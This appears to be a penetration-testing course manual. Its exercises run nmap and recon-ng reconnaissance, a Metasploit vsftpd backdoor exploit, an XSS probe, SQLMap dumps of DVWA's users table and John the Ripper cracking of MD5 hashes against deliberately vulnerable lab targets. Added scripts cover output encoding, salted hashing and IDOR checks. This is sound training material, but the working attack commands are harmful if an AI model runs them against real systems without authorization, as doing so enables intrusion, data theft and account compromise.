Practical Cybersecurity Penetration Testing Techniques

Experiment 1: Network Reconnaissance and Footprinting

This experiment focuses on gathering information about target networks and systems, a crucial first step in any penetration test.

Deliverable: Network Inventory Report

A detailed report listing discovered IP addresses and active services.

Tools for Reconnaissance

  • Nmap (Network Mapper): An open-source tool used for network discovery, security auditing, and vulnerability scanning.
  • Recon-ng: A modular, open-source reconnaissance framework used to gather open-source intelligence (OSINT) for ethical hacking and penetration testing.

Execution Steps and Commands

Run the two nmap commands in a terminal. Starting recon-ng opens its own interactive shell; the remaining lines are typed at the recon-ng prompt (recon-ng 5 syntax, where module options are set with `options set`):

$ nmap -sn 192.168.1.0/24            # ping sweep: which hosts in the subnet are up
$ nmap -sS -sV -O 192.168.1.5        # SYN scan, service versions and OS guess for one host
$ recon-ng
[recon-ng][default] > workspaces create TechSecure
[recon-ng][TechSecure] > marketplace install all
[recon-ng][TechSecure] > modules load recon/domains-hosts/hackertarget
[recon-ng][TechSecure][hackertarget] > options set SOURCE google.com
[recon-ng][TechSecure][hackertarget] > run
[recon-ng][TechSecure][hackertarget] > modules load reporting/html
[recon-ng][TechSecure][html] > options set CREATOR TechSecure
[recon-ng][TechSecure][html] > options set CUSTOMER TechSecure
[recon-ng][TechSecure][html] > options set FILENAME /kali/Desktop/TechSecure.html
[recon-ng][TechSecure][html] > run

Experiment 2: Vulnerability Scanning and Assessment

This experiment demonstrates how to identify security weaknesses in web servers and applications.

Deliverable: Vulnerability Assessment Report

A report detailing identified vulnerabilities, including CVE references and risk ratings.

Key Tool: Nikto Web Scanner

  • Nikto: An open-source web server scanner that detects vulnerabilities, outdated software, and security issues in web servers.

Execution Steps

Execute the following commands to scan for web server vulnerabilities:

$ nikto -h http://[IP ADDRESS OF METASPLOITABLE 2]/dvwa/index.php -o /kali/Desktop/nescan.txt
$ mousepad /kali/Desktop/nescan.txt

After scanning, create a table with the following columns to document findings:

  • Vulnerability Description
  • CVE/Reference ID
  • Risk Rating

Experiment 3: Exploiting Known Vulnerabilities

This experiment focuses on actively exploiting identified vulnerabilities to demonstrate their impact.

Deliverable: Proof of Exploit Session and Impact Notes

A screenshot and log of a successful exploit session, along with notes on the potential impact of the vulnerability.

Tools for Vulnerability Exploitation

  • Metasploit Framework: An open-source penetration testing platform that enables security professionals to find, exploit, and validate vulnerabilities in systems.
  • Metasploitable 2: A deliberately vulnerable Linux virtual machine designed for testing and practicing penetration testing with tools like Metasploit.
  • Nmap (Network Mapper): A free, open-source tool used to discover hosts, services, and vulnerabilities on a computer network by sending packets and analyzing responses.

Execution Steps

Follow these steps to exploit a known vulnerability using Metasploit:

  1. Check the IP address of Metasploitable 2.
  2. Scan the target:
    $ nmap -sS -sV -O [IP address]/24
  3. Launch Metasploit console:
    $ msfconsole
  4. Search for the target exploit (e.g., vsftpd); these commands are typed at the Metasploit prompt:
    msf6 > search vsftpd
  5. Select the exploit module:
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
  6. Set the remote host (the option is named RHOSTS in current Metasploit):
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS [IP address]
  7. Execute the exploit until a session is opened:
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Experiment 5: Cross-Site Scripting (XSS) with Burp Suite and Juice Shop

This experiment aims to understand and demonstrate how a simple Cross-Site Scripting (XSS) attack works using Burp Suite and deliberately vulnerable web applications.

Key XSS Concepts

  • XSS: Cross-Site Scripting, a type of security vulnerability enabling attackers to inject client-side scripts into web pages viewed by other users.
  • Payload: The malicious script or code injected during an attack.
  • URL Encoding: Replacing characters that are reserved or not allowed in a URL (spaces, `<`, `>`, `&`, quotes) with percent-escapes such as `%20` and `%3C`, so that a value placed in a query string reaches the server intact; the intercepted request in Burp shows the payload in this encoded form.
  • Burp Suite: An integrated platform for performing security testing of web applications.
  • Intercept: The ability of a proxy tool like Burp Suite to capture and modify HTTP requests and responses.

Tools for XSS Testing

  • OWASP Juice Shop
  • Burp Suite Community Edition

Execution Steps for XSS Demonstration

  1. Start the OWASP Juice Shop application.
  2. Open Burp Suite.
  3. Open the built-in Burp browser.
  4. Find a form within the Juice Shop application (e.g., customer feedback or search bar).
  5. Fill in the form with an XSS payload.
  6. Intercept the request in Burp Suite.
  7. View the result, observing the XSS payload execution.

What You Will Learn

  • What is Cross-Site Scripting (XSS) and its types (Stored, Reflected, DOM-based).
  • How to intercept and modify HTTP requests using Burp Suite Proxy.
  • Crafting malicious payloads to trigger XSS alerts.
  • Practical demonstration on OWASP Juice Shop’s Customer Feedback and Search functionalities.
  • Understanding XSS impact and basic mitigation techniques.

Tools Used:

  • Burp Suite Community Edition
  • OWASP Juice Shop (local instance)
  • Google Chrome (with proxy configured)
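What Burp lets you watch in this experiment is the round trip of the search term: the browser percent-encodes it, the server decodes it, and then either writes it into the page raw or output-encodes it first. The script below is an added example, not part of the lab text or of Juice Shop's code; it models that round trip in a few functions so the difference between the vulnerable and the hardened rendering is visible side by side. The `/search` URL and the function names are illustrative, and `PROBE` is the constructed test input.

```python
"""Reflected XSS: vulnerable vs hardened rendering of a search term.

Added example, not from the lab text or Juice Shop. Models the path the q
parameter takes: URL-encoded by the browser, decoded by the server, then
concatenated into HTML raw (vulnerable) or output-encoded (hardened).
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed test input: the textbook probe that pops an alert if the page
# writes the term into HTML without encoding it.
PROBE = "<script>alert(1)</script>"


def build_search_url(base, query):
    """What the browser sends: reserved characters percent-encoded (< is %3C, > is %3E)."""
    return f"{base}?q={quote(query, safe='')}"


def query_from_url(url):
    """Server side: parse_qs undoes the percent-encoding, so q is the raw term again."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(query):
    """Reflected XSS: the decoded term is concatenated into markup unchanged."""
    return f"<h2>Search results for: {query}</h2>"


def render_hardened(query):
    """Output encoding for an HTML text context: the browser displays
    &lt;script&gt; as text instead of parsing it as a tag."""
    return f"<h2>Search results for: {html.escape(query, quote=True)}</h2>"


def reflects_markup(rendered, query):
    """Response check a tester applies to the intercepted reply: does the
    term come back with its tags intact rather than entity-encoded?"""
    return query in rendered and html.escape(query, quote=True) not in rendered


if __name__ == "__main__":
    # Illustrative local URL; Juice Shop's real route layout is not assumed here.
    url = build_search_url("http://localhost:3000/search", PROBE)
    print("request   :", url)
    q = query_from_url(url)
    for label, page in (("vulnerable", render_vulnerable(q)), ("hardened  ", render_hardened(q))):
        print(f"{label}: {page}  -> reflects markup: {reflects_markup(page, q)}")
```

The hardened function is context-specific: `html.escape` is the right encoder for text between tags, but a value written into a JavaScript string, a URL attribute or a CSS block needs the encoder for that context, which is why the same payload can be blocked in one place on a page and still fire in another.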

Experiment 4: SQL Injection Attacks on Web Applications

This experiment demonstrates how to perform SQL injection attacks to extract sensitive database information from web applications.

Deliverable: Extracted Database Entries and Risk Report

Proof of extracted database entries and a brief report on the risk posed to the organization by SQL injection vulnerabilities.

Tools and Concepts for SQL Injection

  • SQLMap: An open-source tool that automates detecting and exploiting SQL injection vulnerabilities in web applications.
  • SQL Injection: A web security vulnerability that allows attackers to interfere with a web application’s database queries.
  • DVWA (Damn Vulnerable Web Application): A deliberately insecure web application designed for learning and practicing web vulnerabilities like SQL injection.

Execution Steps for SQL Injection

Follow these steps to perform SQL injection using SQLMap on DVWA:

  1. Install SQLMap:
    $ sudo apt install sqlmap
  2. Log in to DVWA with the following credentials:
    • Username: admin
    • Password: password
  3. Go to the ‘DVWA Security’ section and set the security level to ‘Low’.
  4. Navigate to the ‘SQL Injection’ page and enter ‘1’ as the ID.
  5. Use browser developer tools (Inspect Element) to obtain the PHP session ID and security level cookie values.
  6. Execute SQLMap with the obtained cookie values:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low"
  7. To enumerate databases, run:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" --dbs
  8. To display tables in a database (e.g., dvwa), run:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" -D dvwa --tables
  9. To view columns in a specific table (e.g., users), run:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" -D dvwa -T users --columns
  10. To dump all data from the ‘users’ table:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" -D dvwa -T users --dump

Experiment 6: Password Hash Cracking with John the Ripper

This experiment focuses on understanding password hashing and demonstrating how to crack password hashes using John the Ripper.

Deliverable: Cracked Passwords and Complexity Recommendations

A list of cracked passwords or confirmed account access, along with recommendations for password complexity and security.

Understanding Password Hashing and Cracking

  • Introduction to password hashing and cracking principles.
  • Installing and using John the Ripper on Kali Linux.
  • Cracking example password hashes.
  • Understanding various hash types (e.g., MD5, SHA1).
  • Importance of strong password policies in cybersecurity.

Tools for Password Cracking

  • Kali Linux
  • John the Ripper

Example Hash File Inputs

Create a file named hash.txt with the following content:

user1:5f4dcc3b5aa765d61d8327deb882cf99
admin:21232f297a57a5a743894a0e4a801fc3
test:098f6bcd4621d373cade4e832627b4f6
guest:81dc9bdb52d04dc20036dbd8313ed055
root:e99a18c428cb38d5f260853678922e03

Execution Commands

Use these commands to install John the Ripper and crack the hashes:

$ sudo apt install john
$ john --format=RAW-MD5 /home/student/Desktop/hash.txt
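The complexity recommendations in the deliverable should explain why these particular hashes fall so fast: they are unsalted MD5, so one hash computation per candidate word tests that word against every account at once, and two users with the same password have identical lines in the file. The script below is an added example, not from the lab text or John the Ripper. It replays that wordlist idea on the lab's `hash.txt` with a small constructed wordlist, then shows the storage format that removes the shortcut, a per-user salt and an iterated KDF (PBKDF2-HMAC-SHA256 from Python's `hashlib`). `WORDLIST` and the record format are constructed.

```python
"""Why the hash.txt entries fall quickly, and what to store instead.

Added example, not from the lab text or John the Ripper. HASH_FILE is the
lab's hash.txt; WORDLIST and the pbkdf2 record layout are constructed.
"""
import hashlib
import hmac
import os

HASH_FILE = """user1:5f4dcc3b5aa765d61d8327deb882cf99
admin:21232f297a57a5a743894a0e4a801fc3
test:098f6bcd4621d373cade4e832627b4f6
guest:81dc9bdb52d04dc20036dbd8313ed055
root:e99a18c428cb38d5f260853678922e03
"""

# Constructed wordlist of common choices; john would normally use a large
# list such as rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "admin", "letmein",
            "test", "1234", "abc123", "welcome", "monkey"]


def parse_hash_file(text):
    """user:hexdigest lines, the layout john's raw-md5 format reads."""
    entries = {}
    for line in text.splitlines():
        if ":" in line:
            user, digest = line.split(":", 1)
            entries[user.strip()] = digest.strip().lower()
    return entries


def wordlist_check_md5(entries, wordlist):
    """Unsalted MD5: hash each candidate once and match it against every
    user simultaneously. Cost is one MD5 per word, independent of the
    number of accounts."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[d] for user, d in entries.items() if d in table}


def hash_password(password, salt=None, iterations=600_000):
    """Salted, iterated hash stored as algorithm$iterations$salt$digest.
    A fresh random salt per user means the precomputed table above cannot
    be reused, and the iteration count makes each guess slow."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    found = wordlist_check_md5(parse_hash_file(HASH_FILE), WORDLIST)
    print(f"recovered with a {len(WORDLIST)}-word list:", found)
    # Same password twice: identical MD5 lines in the file, but two different PBKDF2 records.
    a = hash_password("password", iterations=100_000)
    b = hash_password("password", iterations=100_000)
    print("salted records differ:", a != b, "| verify:", verify_password("password", a))
```

Salting and iteration do not rescue a password that is itself on a short wordlist; they only make each guess cost the attacker as much as it costs the server. The policy recommendation therefore has two halves: a slow salted hash on the storage side, and length plus blocklisting of common passwords on the user side.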

Experiment 9: Comprehensive Web Application Penetration Testing

This experiment simulates a full web application penetration test, covering various stages from reconnaissance to exploitation.

Penetration Test Deliverables

  • Reconnaissance and Information Gathering Report
  • Vulnerability Scanning Report
  • Proof of Exploiting Web Application Flaws (e.g., SQLi, XSS, Broken Authentication)
  • Documentation of Accessing Admin Panels and Sensitive Data
  • Final Reporting and Documentation

Tools for Web Application Penetration Testing

  • OWASP Juice Shop
  • Burp Suite
  • Nmap (optional)
  • Browser Developer Tools

Execution Steps for Full Web App Pentest

  1. Start the OWASP Juice Shop application.
  2. Perform Cross-Site Scripting (XSS) in the search bar.
  3. Execute SQL Injection in the login form.
  4. Demonstrate Broken Authentication using Burp Suite Intruder.
  5. Identify and exploit Insecure Direct Object Reference (IDOR) vulnerabilities.
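Step 5 names IDOR, which is the absence of one specific check: the application authenticated the user but never asked whether the object id in the request belongs to them. The script below is an added example, not from the lab text or Juice Shop's code. It shows a constructed order store with a handler that trusts the id from the URL beside one that verifies ownership, and a small log-based check for the access pattern that probing ids leaves behind. The order data, the handler names and the log format are all constructed.

```python
"""Object-level authorization: the check whose absence is an IDOR.

Added example, not from the lab text or Juice Shop. The order store, the
handler functions and the log line format are constructed for illustration.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Order:
    order_id: int
    owner_id: int
    total: float


# Constructed data: orders belonging to two users.
ORDERS = {
    101: Order(101, owner_id=1, total=19.99),
    102: Order(102, owner_id=2, total=45.00),
    103: Order(103, owner_id=1, total=7.50),
}


class NotFound(Exception):
    pass


def get_order_idor(requester_id, order_id):
    """Vulnerable: the id from the URL is used as-is. Authentication happened,
    authorization did not, so user 2 can read user 1's orders."""
    if order_id not in ORDERS:
        raise NotFound(order_id)
    return ORDERS[order_id]


def get_order_hardened(requester_id, order_id, is_admin=False):
    """Fixed: after lookup, verify the requester owns the object (or holds an
    admin role). Missing and foreign objects get the same response so the id
    space cannot be mapped by comparing error types."""
    order = ORDERS.get(order_id)
    if order is None or (order.owner_id != requester_id and not is_admin):
        raise NotFound(order_id)
    return order


def denied_access_by_user(log_lines, threshold=3):
    """Detection: many denied object lookups from one account is the footprint
    of someone iterating ids. Lines use a constructed
    'user=<id> order=<id> result=<status>' format."""
    counts = Counter()
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split())
        if fields.get("result") == "404":
            counts[fields["user"]] += 1
    return {user: n for user, n in counts.items() if n >= threshold}


# Constructed log sample: user 2 walking through order ids.
SAMPLE_LOG = [
    "user=1 order=101 result=200",
    "user=2 order=101 result=404",
    "user=2 order=102 result=200",
    "user=2 order=103 result=404",
    "user=2 order=104 result=404",
    "user=2 order=105 result=404",
]

if __name__ == "__main__":
    print("IDOR leak   :", get_order_idor(2, 101))
    try:
        get_order_hardened(2, 101)
    except NotFound:
        print("hardened    : user 2 cannot read order 101")
    print("enumerators :", denied_access_by_user(SAMPLE_LOG))
```

The same ownership check belongs in every handler that takes an object id, including update and delete paths, and it has to run server-side: hiding ids in the UI or making them unguessable only raises the cost of finding them, it does not remove the flaw.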